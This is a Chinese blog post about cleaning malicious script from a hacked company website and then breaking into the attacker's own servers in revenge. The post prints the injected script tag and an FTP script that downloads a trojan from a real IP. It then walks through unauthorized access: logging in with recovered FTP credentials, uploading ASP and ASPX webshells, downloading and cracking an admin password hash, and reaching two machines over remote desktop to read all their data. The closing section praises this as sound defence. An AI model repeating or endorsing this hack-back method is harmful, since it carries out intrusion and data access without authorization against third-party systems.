网络维护过程中的渗透与反渗透
simeon
我的一个朋友告诉我,说他们在访问自己公司网站时,出来一大堆东西,而且杀毒软件还提示网页存在病毒,
我的第一感觉就是公司服务器被人入侵了。
(一)网站挂马检测和清除
1.
使用软件嗅探被挂马页面
朋友将远程终端和公司网站名称告诉我后,我首先在虚拟机中使用
URLSnooper
软件对网站进行嗅探,果然网站多处文件被人挂马,如图
1
所示。登陆远程终端后,一看其服务器配置较高,带宽是
20M
光纤,访问网络的速度非常快,觉得是高质量肉鸡的首选,也难怪被人黑。
图
1
使用
URLSnooper
监听网站所有链接和访问
说明:
(
1
)
URLSnooper
是一款安全检查工具,就其名称意义就知道该软件是
URL
监视,个人感觉是一款捕捉网站是否挂马的好程序。
URLSnooper
安装比较简单,安装完毕后需要安装默认的抓包软件。
(
2
)确认网站被人挂马后,首先将网站文件进行了备份。
直接到网站根目录查看网站文件的最近的一些修改时间,从首页更改的时间为
8
月
25
日
,因此可以借助系统的文件搜索功能搜索
2008
年
8
月
24
日
至
8
月
26
日
之间的文件,如图
2
所示,搜索出来好几十个文件,被修改文件很有特点,
index.html
、
index.asp
、
conn.asp
、
top.asp
、
foot.asp
以及
js
文件均被修改,从文件中可以看出该挂马人绝对是一个团伙或者是一个老手,他不是对所有文件进行挂马,而是有针对性的对一个关键文件进行挂马。
图
2
查找被修改的网站文件
2.
清除挂马代码
在所有文件中查找代码“
<script src=http://%61%76%65%31%2E%63%6E></script>
”将其清除。
(二)系统入侵痕迹搜索和整理
1.
查看入侵者遗留在系统中的痕迹
对系统目录以及服务器所有目录进行文件查看,发现该入侵者使用过“
1433
全自动扫描传马工具”。通过对该工具软件的研究分析,该扫描工具中需要有配置文件,用来下载木马。果不其然,在系统目录下发现有一个文件
cc1.txt
生成日期是
2008
年
5
月
29
日
,大小只有
64
个字节,用
type
命令显示如下:
open 122.138.14.8
gusdn
lixuanyu
binary
get 1.exe
bye
该文件是
FTP
自动下载的配置信息,直接使用
CuteFTP
软件进行
ftp
登陆尝试,填好
IP
地址和帐号密码,顺利登录如图
3
所示!从服务器上的东西不难看出,这台机器的
FTP
路径是
Windows
系统某个磁盘的根目录,里面有不少黑客用的工具,机主肯定是一个入侵者或者安全爱好者。
图
3
成功登陆
Ftp
服务器
说明:
很多入侵者在利用网上下载的工具时,没有很好地设置和改造,只是进行简单的配置后,便开始攻击和入侵。因此,在肉机上经常留下各种木马的安装文件,有时甚至还有
FTP
自动上传文件的配置文件。可以使用“
dir /od /a
”
命令查看当前目录中的文件,如果存在小于
100
字节的文件,则这些文件极有可能为配置文件。
用扫描工具软件查看以下该计算机开放哪些端口,如图
4
所示,系统开放了
80
端口和远程终端服务
3389
端口。
图
4
查看远程服务器开放端口
(三)利用社会工程学进行反渗透
1.
使用获取的
Ftp
账号猜测服务登陆口令
既然在服务器上面开放了
3389
端口、
Ftp
服务,那么可以尝试利用
FTP
的帐号和口令登录它的
3389
远程桌面,猜测
administrator
的口令,结果不是
gusdn
,也不是
lixuanxu
,说明使用
Ftp
账号和口令不能进入系统,换一个思路。
2.
从网站入手
接下来,使用
IE
浏览器打开该
IP
地址,可以正常访问网站,该服务提供了
Web
服务,网站为游戏私服服务器,如图
5
所示,通过
HDSI
以及
Domain3.5
等
SQL
注入工具对网站进行了探测,未找到可以利用的地方。
图
5
服务器提供
web
服务
3.
从
Ftp
目录入手
猛然想起在
FTP
的目录中有一个
web
子目录,会不会与网站有关系呢?先上传个
asp
木马到
web
目录试试。不试不知道,一试吓一跳,这个目录居然正是网站的根目录,
asp
小马可以正常运行,如图
6
所示,通过
asp
木马在网站中看了看,发现可以浏览所有磁盘,不过只有
D
盘有写权限。经过与
FTP
中的文件进行对比,
FTP
的根目录也就是
D
盘。
图
6
上传
Asp
木马
好了,现在既可以上传文件,也可以浏览文件。要想提升权限,还必须要能执行命令。我上传了一个
asp
的
cmd
木马到
web
目录,结果竟然不能执行。继续利用
asp
木马在机器上找找其它的突破口,结果一无所获。
FTP
不是用
Serv-U
开的,
C
盘不可写,不能执行命令,怎么办?
4.
上传
Asp.net
木马提升系统权限
忽然想起用
3389
登录这台机器时,它的操作系统是
2003
,可能支持
asp.net
,我为什么不上传个
aspx
的
CMD
的木马试试。说干就干。果然,
aspx
木马能执行命令了,如图
7
所示。查看机器的用户列表,居然没有
administrator
却有个
xuanyu
,而
FTP
的口令是
lixuanyu
,一定是管理员把超级用户改名过来的。它的口令会是什么呢?还是用
3389
登录器测试一番,不是
gusdn
,不是
lixuanyu
,更不是
12345678
,猜不出来了。
图
7
使用
asp.net
木马查看系统管理员账号
5.
获取数据库用户管理员密码
按照密码设置习惯,入侵者极有可能使用了相同密码,因此可以尝试获取数据库中用户的密码来登陆远程终端服务器。使用
CuteFtp
对整个网站目录中的文件进行查看,在
TT
目录中发现数据库文件“
$_$%
●
yingzi
!#%&^$#.asa
”,使用
FTP
下载回来后,把文件的后缀改为
mdb
,使用
access
直接打开该数据库,如图
8
所示,从中找到管理员使用的表
Gq_Admin
。
如图
8
所示,获取管理员表
Gq_Admin
从表
Gq_Admin
中发现存在
gusdn
用户,并且是个高级管理员,他的密码用
MD5
加密后是
5334e6dd7b8exxxx
。赶紧打开网页
[url]www.cmd5.com[/url]
,填好
16
位密码,解密!
Ok
,不到
1
分钟密码出来了,
12703XXX
,如图
9
所示。
图
9
获取用户的密码
6.
再次登陆远程终端
直接打开远程终端连接器,在其中输入用户名“
xuanyu
”,密码“
12703XXX
”,然后单击“连接”,很快成功进入该计算机,如图
10
所示。
图
10
成功进入入侵者计算机服务器
7.
查看入侵者服务器
使用
systeminfo
工具查看系统的详细情况:
Systeminfo
Default Domain: KIRY-C1AEF31B8B
IP Address: 122.138.14.8
Computer Name: KIRY-C1AEF31B8B
Current UserName: xuanyu
Update Time: 0 day 22 Hour 43 Min 57 Sec
Total Memory: 1015 MB
Free Memory: 682 MB
CPU Speed: 2.7 GHz
Cpu Number: 2
Language: Chinese (PRC)
Operate System: WIN2003
Window Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Hard Disk: C:\ (NTFS) Total 9.77 Gb, Free 4.02 Gb.
Hard Disk: D:\ (NTFS) Total 29.29 Gb, Free 26.86 Gb.
Hard Disk: E:\ (NTFS) Total 31.81 Gb, Free 27.74 Gb.
几天后,这台机器的
FTP
服务没有了,网站也从
122.138.14.8
搬到了
122.138.14.4
,并且只能用域名
[url]www.sow2i.com[/url]
来登录了。不过,它们的
3389
还都是有的,而且两台机器的帐号和口令都是一样的。这样,成功渗透第二台计算机,在计算机上面给了一个警告,呵呵,当然彻底的查看了该计算机上面的所有资料。
(四)总结
网络安全与维护是攻击与防护的对立统一,好的攻击就是好的防护,从挂马的计算机中中获取的痕迹,反过来渗透到入侵者的计算机,也不是不可能的事情。回想反渗透入侵者的服务器过程中,突破口只是一个
FTP
口令,接下来从网页木马到数据库下载,从
MD5
的
管理员口令到主机用户口令,最后实现了
3389
的远程桌面登录。整个过程并没有多少技术含量,就是因为入侵者的疏忽大意,结果被反渗透!因此在网络管理与维护过程中,碰到问题不要害怕,仔细分析,合理利用每一个掌握的信息,极有可能发生意想不到的事情,让我们在网络维护过程中享受工作的乐趣。
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/100465